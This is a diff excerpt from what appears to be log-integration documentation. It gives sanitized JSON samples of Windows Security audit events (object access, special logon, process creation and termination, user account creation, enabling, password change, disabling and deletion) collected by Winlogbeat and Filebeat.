:\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "kind": "event" + }, + "@version": "1", + "agent": { + "name": "ACCOUNT01", + "ephemeral_id": "12345678-1234-5678-9012-345678901234", + "type": "winlogbeat", + "version": "8.12.2", + "id": "abcdefab-cdef-abcd-efab-cdefabcdefab" + }, + "host": { + "hostname": "account01", + "mac": [ + "00-11-22-33-44-55" + ], + "architecture": "x86_64", + "id": "11111111-2222-aaaa-bbbb-333333333333", + "name": "account01", + "ip": [ + "1.2.3.4" + ], + "os": { + "type": "windows", + "build": "17763.6414", + "name": "Windows Server 2019 Standard", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "platform": "windows", + "version": "10.0", + "family": "windows" + } + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "api": "wineventlog", + "channel": "Security", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "task": "Directory Service Access", + "process": { + "pid": 744, + "thread": { + "id": 864 + } + }, + "record_id": 476080242, + "event_id": "4662", + "provider_name": "Microsoft-Windows-Security-Auditing", + "opcode": "Informations", + "computer_name": "ACCOUNT01.domain.local", + "event_data": { + "HandleId": "0x0", + "SubjectLogonId": "0xc2b9d138", + "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}", + "ObjectServer": "DS", + "OperationType": "Object Access", + "SubjectUserSid": "S-1-2-3", + "AdditionalInfo": "-", + "AccessMask": "0x100", + "SubjectDomainName": "DOMAIN", + "ObjectName": 
"%{12345678-abcd-ef90-1234-abcdef123456}", + "SubjectUserName": "ACCOUNT01$", + "AccessList": "%%7688\n\t\t\t\t", + "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}" + } + } + } + ``` + + + +=== "security_event_4672" + + + ```json + { + "event": { + "provider": "Microsoft-Windows-Security-Auditing", + "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "code": "4672", + "outcome": "success", + "created": "2024-11-12T09:08:54.122Z", + "action": "Special Logon", + "kind": "event" + }, + "@timestamp": "2024-11-12T09:08:50.647Z", + "ecs": { + "version": "8.0.0" + }, + "tags": [ + "forwarded", + "beats_input_codec_plain_applied" + ], + "log": { + "level": "information" + }, + "message": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "host": { + "name": "USER01-WIN.domain.priv" + }, + "agent": { + "name": "AGENT", + "version": "8.11.1", + "type": "winlogbeat", + "ephemeral_id": 
"12345678-abcd-ef90-1234-abcdef123456", + "id": "11111111-aaaa-2222-bbbb-333333333333" + }, + "winlog": { + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "channel": "Security", + "task": "Special Logon", + "computer_name": "USER01-WIN.domain.priv", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}", + "event_data": { + "SubjectLogonId": "0x40c158b6", + "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "SubjectDomainName": "DOMAIN", + "SubjectUserName": "USER01-WIN$", + "SubjectUserSid": "S-1-2-3" + }, + "process": { + "thread": { + "id": 27812 + }, + "pid": 828 + }, + "event_id": "4672", + "api": "wineventlog", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": 288206963 + }, + "@version": "1" + } + ``` + + + +=== "security_event_4688" + + + ```json + { + "tags": [ + "beats_input_codec_plain_applied" + ], + "event": { + "original": "A new process has been created.\\n\\nCreator Subject:\\n\\tSecurity ID:\\t\\tS-1-1-1\\n\\tAccount Name:\\t\\tHOST01$\\n\\tAccount Domain:\\t\\tCOMPANY\\n\\tLogon ID:\\t\\t0x3E7\\n\\nTarget Subject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nProcess Information:\\n\\tNew Process ID:\\t\\t0x1d9c\\n\\tNew Process Name:\\tC:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\\n\\tToken Elevation Type:\\tTokenElevationTypeDefault (1)\\n\\tMandatory Label:\\t\\tS-1-2-3\\n\\tCreator Process ID:\\t0x2a0\\n\\tCreator Process Name:\\tC:\\\\Windows\\\\System32\\\\services.exe\\n\\tProcess Command Line:\\tC:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\\n\\nToken Elevation Type indicates the type of token that was 
assigned to the new process in accordance with User Account Control policy.\\n\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\n\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\n\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.", + "action": "Process Creation", + "kind": "event", + "outcome": "success", + "created": "2023-11-09T08:43:52.407Z", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4688" + }, + "@version": "1", + "@timestamp": "2023-11-09T08:43:51.462Z", + "message": "A new process has been created.\\n\\nCreator Subject:\\n\\tSecurity ID:\\t\\tS-1-1-1\\n\\tAccount Name:\\t\\tHOST01$\\n\\tAccount Domain:\\t\\tCOMPANY\\n\\tLogon ID:\\t\\t0x3E7\\n\\nTarget Subject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nProcess Information:\\n\\tNew Process ID:\\t\\t0x1d9c\\n\\tNew Process Name:\\tC:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\\n\\tToken Elevation Type:\\tTokenElevationTypeDefault (1)\\n\\tMandatory Label:\\t\\tS-1-2-3\\n\\tCreator Process ID:\\t0x2a0\\n\\tCreator Process Name:\\tC:\\\\Windows\\\\System32\\\\services.exe\\n\\tProcess Command 
Line:\\tC:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\\n\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\n\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\n\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\n\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.", + "winlog": { + "computer_name": "HOST01.company.test", + "provider_name": "Microsoft-Windows-Security-Auditing", + "channel": "Security", + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "keywords": [ + "Audit Success" + ], + "version": 2, + "event_id": "4688", + "process": { + "pid": 4, + "thread": { + "id": 17028 + } + }, + "task": "Process Creation", + "event_data": { + "ParentProcessName": "C:\\\\Windows\\\\System32\\\\services.exe", + "TokenElevationType": "%%1936", + "MandatoryLabel": "S-1-2-3", + "TargetUserSid": "S-1-0-0", + "SubjectUserSid": "S-1-1-1", + "SubjectDomainName": "COMPANY", + "SubjectLogonId": "0x3e7", + "CommandLine": "C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe", + "NewProcessId": "0x1d9c", + "TargetDomainName": "-", + "ProcessId": "0x2a0", + "SubjectUserName": "HOST01$", + "TargetUserName": "-", + 
"NewProcessName": "C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe", + "TargetLogonId": "0x0" + }, + "record_id": 8884538, + "api": "wineventlog", + "opcode": "Info" + }, + "host": { + "hostname": "host01", + "id": "abcdefgh-1234-5678-abcd-efgh12345678", + "ip": [ + "8.8.8.8" + ], + "name": "host01", + "mac": [ + "00-11-22-33-44-55" + ], + "architecture": "x86_64", + "os": { + "build": "20348.2031", + "version": "10.0", + "name": "Windows Server 2022 Standard", + "family": "windows", + "kernel": "10.0.20348.2031 (WinBuild.160101.0800)", + "type": "windows", + "platform": "windows" + } + }, + "log": { + "level": "information" + }, + "ecs": { + "version": "8.0.0" + }, + "agent": { + "type": "winlogbeat", + "ephemeral_id": "7ecf606a-ee47-4796-a223-4e6bb827233d", + "id": "65ede6f4-4783-4792-8dc0-8364bc33b7bd", + "version": "8.10.4", + "name": "HOST01" + } + } + ``` + + + +=== "security_event_4689" + + + ```json + { + "event": { + "provider": "Microsoft-Windows-Security-Auditing", + "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "code": "4689", + "outcome": "success", + "created": "2024-11-12T09:10:18.932Z", + "action": "Process Termination", + "kind": "event" + }, + "@timestamp": "2024-11-12T09:10:13.534Z", + "ecs": { + "version": "8.0.0" + }, + "tags": [ + "forwarded", + "beats_input_codec_plain_applied" + ], + "log": { + "level": "information" + }, + "message": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus 
:\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "host": { + "name": "ACCOUNT_01.domain.priv" + }, + "agent": { + "name": "AGENT", + "version": "8.11.1", + "type": "winlogbeat", + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee" + }, + "winlog": { + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "channel": "Security", + "task": "Process Termination", + "computer_name": "ACCOUNT_01.domain.priv", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "event_data": { + "SubjectLogonId": "0x3e7", + "Status": "0x0", + "ProcessId": "0x1df8", + "SubjectDomainName": "DOMAIN", + "SubjectUserName": "ACCOUNT_01$", + "SubjectUserSid": "S-1-2-3", + "ProcessName": "C:\\Windows\\System32\\process.exe" + }, + "process": { + "thread": { + "id": 620 + }, + "pid": 4 + }, + "event_id": "4689", + "api": "wineventlog", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": 1564712 + }, + "@version": "1" + } + ``` + + + +=== "security_event_4720" + + + ```json + { + "tags": [ + "forwarded", + "beats_input_raw_event" + ], + "@version": "1", + "host": { + "name": "HOST01.reseau.company" + }, + "type": "winlogbeat", + "ecs": { + "version": "1.8.0" + }, + "agent": { + "version": "7.12.1", + "name": "AGENT", + "hostname": "AGENT", + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "type": "winlogbeat" + }, + "@timestamp": "2024-11-12T04:47:02.389Z", + "user": { + "domain": "RESEAU-COMPANY", + "id": "S-1-2-3", + "name": "user-name" + }, + "event": { + "outcome": "success", + "action": "added-user-account", + "category": [ + "iam" + ], + "module": "security", + "kind": "event", + "code": 4720, + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "user", + "creation" + ], + "created": "2024-11-12T04:47:08.322Z" + }, + "fields": { + "env_AD": "AD Company" + }, + "log": { + "level": "information" 
+ }, + "related": { + "user": [ + "user-name", + "USER" + ] + }, + "winlog": { + "event_data": { + "SubjectUserSid": "S-1-2-3", + "SubjectDomainName": "RESEAU-COMPANY", + "PrivilegeList": "-", + "UserWorkstations": "-", + "SubjectLogonId": "0x2a4b2040", + "SidHistory": "-", + "TargetUserName": "USER", + "TargetDomainName": "RESEAU-COMPANY", + "OldUacValue": "0x0", + "SubjectUserName": "user-name", + "UserPrincipalName": "USER@reseau.company", + "HomeDirectory": "-", + "AccountExpires": "%%1794", + "SamAccountName": "USER", + "ProfilePath": "-", + "HomePath": "-", + "DisplayName": "-", + "PasswordLastSet": "%%1794", + "AllowedToDelegateTo": "-", + "ScriptPath": "-", + "UserParameters": "-", + "NewUacValue": "0x214", + "LogonHours": "%%1793", + "UserAccountControl": [ + "2082", + "2084", + "2089" + ], + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "PrimaryGroupId": "513", + "TargetSid": "S-1-2-3-4-5-6-7" + }, + "record_id": 479720536, + "process": { + "thread": { + "id": 1940 + }, + "pid": 612 + }, + "opcode": "Info", + "api": "wineventlog", + "event_id": 4720, + "logon": { + "id": "0x2a4b2040" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "keywords": [ + "Audit Success" + ], + "provider_guid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "task": "User Account Management", + "computer_name": "HOST01.reseau.company", + "channel": "Security" + } + } + ``` + + + +=== "security_event_4722" + + + ```json + { + "@timestamp": "2024-11-12T08:53:57.535Z", + "event": { + "action": "User Account Management", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4722", + "created": "2024-11-12T08:53:58.677Z", + "kind": "event", + "dataset": "system.security", + "original": "A user account was enabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount 
Domain:\t\tDOMAIN" + }, + "message": "A user account was enabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN", + "elastic_agent": { + "version": "8.14.1", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "snapshot": false + }, + "log": { + "level": "information" + }, + "data_stream": { + "type": "logs", + "dataset": "system.security", + "namespace": "windows" + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "keywords": [ + "Audit Success" + ], + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "task": "User Account Management", + "channel": "Security", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "event_data": { + "TargetUserName": "ACC_NAME", + "SubjectDomainName": "DOMAIN", + "SubjectUserName": "account-name", + "TargetDomainName": "DOMAIN", + "SubjectLogonId": "0x4a13c3fc", + "SubjectUserSid": "S-1-2-3", + "TargetSid": "S-1-2-3-4-5" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "api": "wineventlog", + "opcode": "Info", + "computer_name": "PC01.domain.com", + "record_id": 13042939152, + "event_id": "4722" + }, + "input": { + "type": "winlog" + }, + "@version": "1", + "agent": { + "version": "8.14.1", + "type": "filebeat", + "name": "PC01", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333" + }, + "tags": [ + "Windows", + "beats_input_codec_plain_applied" + ], + "host": { + "hostname": "pc01", + "architecture": "x86_64", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "name": "pc01", + "mac": [ + "AA-BB-CC-DD-EE-FF" + ], + "os": { + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "version": "10.0", + "type": "windows", + "name": "Windows Server 2019 Standard", + "build": "17763.6414", + "family": "windows", + "platform": "windows" + }, + "ip": [ + 
"1.2.3.4" + ] + } + } + ``` + + + +=== "security_event_4723" + + + ```json + { + "@timestamp": "2024-11-12T08:59:04.757Z", + "event": { + "action": "User Account Management", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4723", + "created": "2024-11-12T08:59:05.295Z", + "kind": "event", + "dataset": "system.security", + "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-" + }, + "message": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-", + "elastic_agent": { + "version": "8.14.1", + "id": "123456-abcd-ef90-1234-abcdef123456", + "snapshot": false + }, + "log": { + "level": "information" + }, + "data_stream": { + "type": "logs", + "dataset": "system.security", + "namespace": "windows" + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "keywords": [ + "Audit Success" + ], + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "task": "User Account Management", + "channel": "Security", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "event_data": { + "PrivilegeList": "-", + "TargetUserName": "ACCOUNT", + "SubjectDomainName": "DOMAIN", + "SubjectUserName": "ACCOUNT", + "TargetDomainName": "DOMAIN", + "SubjectLogonId": "0x4a28ebbf", + "SubjectUserSid": "S-1-2-3", + "TargetSid": "S-1-2-3" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "api": "wineventlog", + "opcode": "Info", + "computer_name": "PC01.domain.com", + 
"record_id": 13043050897, + "event_id": "4723" + }, + "input": { + "type": "winlog" + }, + "@version": "1", + "agent": { + "version": "8.14.1", + "type": "filebeat", + "name": "PC01", + "id": "123456-abcd-ef90-1234-abcdef123456", + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333" + }, + "tags": [ + "Windows", + "beats_input_codec_plain_applied" + ], + "host": { + "hostname": "pc01", + "architecture": "x86_64", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "name": "pc01", + "mac": [ + "00-11-22-33-44-55" + ], + "os": { + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "version": "10.0", + "type": "windows", + "name": "Windows Server 2019 Standard", + "build": "17763.6414", + "family": "windows", + "platform": "windows" + }, + "ip": [ + "1.2.3.4" + ] + } + } + ``` + + + +=== "security_event_4725" + + + ```json + { + "@timestamp": "2024-11-12T08:41:11.055Z", + "event": { + "action": "User Account Management", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4725", + "created": "2024-11-12T08:41:11.637Z", + "kind": "event", + "dataset": "system.security", + "original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN" + }, + "message": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN", + "elastic_agent": { + "version": "8.14.1", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "snapshot": false + }, + "log": { + "level": "information" + }, + "data_stream": { + "type": "logs", + "dataset": "system.security", + "namespace": "windows" + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "keywords": [ + 
"Audit Success" + ], + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "task": "User Account Management", + "channel": "Security", + "process": { + "pid": 756, + "thread": { + "id": 7304 + } + }, + "event_data": { + "TargetUserName": "ACCOUNT", + "SubjectDomainName": "DOMAIN", + "SubjectUserName": "jdoe", + "TargetDomainName": "DOMAIN", + "SubjectLogonId": "0x493fa12d", + "SubjectUserSid": "S-1-2-3", + "TargetSid": "S-4-5-6" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "api": "wineventlog", + "opcode": "Info", + "computer_name": "PC01.domain.com", + "record_id": 13042691344, + "event_id": "4725" + }, + "input": { + "type": "winlog" + }, + "@version": "1", + "agent": { + "version": "8.14.1", + "type": "filebeat", + "name": "PC01", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "ephemeral_id": "11111111-2222-3333-4444-555555555555" + }, + "tags": [ + "Windows", + "beats_input_codec_plain_applied" + ], + "host": { + "hostname": "pc01", + "architecture": "x86_64", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "name": "pc01", + "mac": [ + "00-11-22-33-44-55" + ], + "os": { + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "version": "10.0", + "type": "windows", + "name": "Windows Server 2019 Standard", + "build": "17763.6414", + "family": "windows", + "platform": "windows" + }, "ip": [ - "1.2.3.4", - "fe80::abcd:123:456" + "1.2.3.4" ] - }, - "event_ingest_logstash": "2023-11-09T09:05:14.912238Z", - "fields.gdp-logstash": "5", - "@version": "1" + } } ``` -=== "security_event_4688" +=== "security_event_4726" ```json { - "tags": [ - "beats_input_codec_plain_applied" - ], + "@version": "1", + "log": { + "level": "information" + }, + "@timestamp": "2024-11-12T07:58:13.288Z", + "message": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount 
Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-", "event": { - "original": "A new process has been created.\\n\\nCreator Subject:\\n\\tSecurity ID:\\t\\tS-1-1-1\\n\\tAccount Name:\\t\\tHOST01$\\n\\tAccount Domain:\\t\\tCOMPANY\\n\\tLogon ID:\\t\\t0x3E7\\n\\nTarget Subject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nProcess Information:\\n\\tNew Process ID:\\t\\t0x1d9c\\n\\tNew Process Name:\\tC:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\\n\\tToken Elevation Type:\\tTokenElevationTypeDefault (1)\\n\\tMandatory Label:\\t\\tS-1-2-3\\n\\tCreator Process ID:\\t0x2a0\\n\\tCreator Process Name:\\tC:\\\\Windows\\\\System32\\\\services.exe\\n\\tProcess Command Line:\\tC:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\\n\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\n\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\n\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\n\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. 
The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.", - "action": "Process Creation", - "kind": "event", + "action": "User Account Management", "outcome": "success", - "created": "2023-11-09T08:43:52.407Z", + "code": "4726", "provider": "Microsoft-Windows-Security-Auditing", - "code": "4688" + "kind": "event", + "created": "2024-11-12T07:58:14.553Z" }, - "@version": "1", - "@timestamp": "2023-11-09T08:43:51.462Z", - "message": "A new process has been created.\\n\\nCreator Subject:\\n\\tSecurity ID:\\t\\tS-1-1-1\\n\\tAccount Name:\\t\\tHOST01$\\n\\tAccount Domain:\\t\\tCOMPANY\\n\\tLogon ID:\\t\\t0x3E7\\n\\nTarget Subject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nProcess Information:\\n\\tNew Process ID:\\t\\t0x1d9c\\n\\tNew Process Name:\\tC:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\\n\\tToken Elevation Type:\\tTokenElevationTypeDefault (1)\\n\\tMandatory Label:\\t\\tS-1-2-3\\n\\tCreator Process ID:\\t0x2a0\\n\\tCreator Process Name:\\tC:\\\\Windows\\\\System32\\\\services.exe\\n\\tProcess Command Line:\\tC:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\\n\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\n\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\n\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. 
An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\n\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.", + "agent": { + "hostname": "hostname", + "id": "12345678-ABCD-ef90-1234-abcdef123456", + "type": "winlogbeat", + "name": "hostname", + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "version": "7.17.1" + }, + "zone": "int", + "site": "site", "winlog": { - "computer_name": "HOST01.company.test", - "provider_name": "Microsoft-Windows-Security-Auditing", + "provider_guid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", "channel": "Security", - "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", - "keywords": [ - "Audit Success" - ], - "version": 2, - "event_id": "4688", "process": { - "pid": 4, + "pid": 632, "thread": { - "id": 17028 + "id": 2056 } }, - "task": "Process Creation", "event_data": { - "ParentProcessName": "C:\\\\Windows\\\\System32\\\\services.exe", - "TokenElevationType": "%%1936", - "MandatoryLabel": "S-1-2-3", - "TargetUserSid": "S-1-0-0", - "SubjectUserSid": "S-1-1-1", - "SubjectDomainName": "COMPANY", - "SubjectLogonId": "0x3e7", - "CommandLine": "C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe", - "NewProcessId": "0x1d9c", - "TargetDomainName": "-", - "ProcessId": "0x2a0", - "SubjectUserName": "HOST01$", - "TargetUserName": "-", - "NewProcessName": "C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe", - "TargetLogonId": "0x0" + "SubjectLogonId": "0x3005c1f76", + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectUserName": "doe.j", + "SubjectUserSid": "S-1-2-3", + 